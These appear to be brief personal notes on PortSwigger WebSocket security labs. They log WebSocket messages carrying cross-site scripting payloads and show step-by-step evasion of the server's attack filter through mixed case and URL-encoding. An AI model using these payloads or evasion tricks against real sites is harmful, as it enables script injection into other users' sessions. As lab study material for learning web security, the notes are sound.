Testing for WebSockets security vulnerabilities
https://portswigger.net/web-security/websockets
Lab: Manipulating WebSocket messages to exploit vulnerabilities
→ To server
{"message":"test"}
← To client
{"user":"You","content":"test"}{"message":"<img src=1 onerror='alert(1)'>"}Lab: Manipulating the WebSocket handshake to exploit vulnerabilities
→ To server
{"message":"<img onclick='alert(1)'>test</img>"}
← To client
{"error":"Attack detected: Event handler"}
→ To server
{"message":"<iframe src='javascript:alert(0)'>"}
← To client
{"error":"Attack detected: JavaScript"}
→ To server
{"message":"<iframe src='javascRipt:alert(0)'>"}
← To client
{"error":"Attack detected: Alert"}
→ To server
{"message":"<iframe src='javascRipt:%61lert(0)'>"}
a -> url encodedLab: Cross-site WebSocket hijacking
Last updated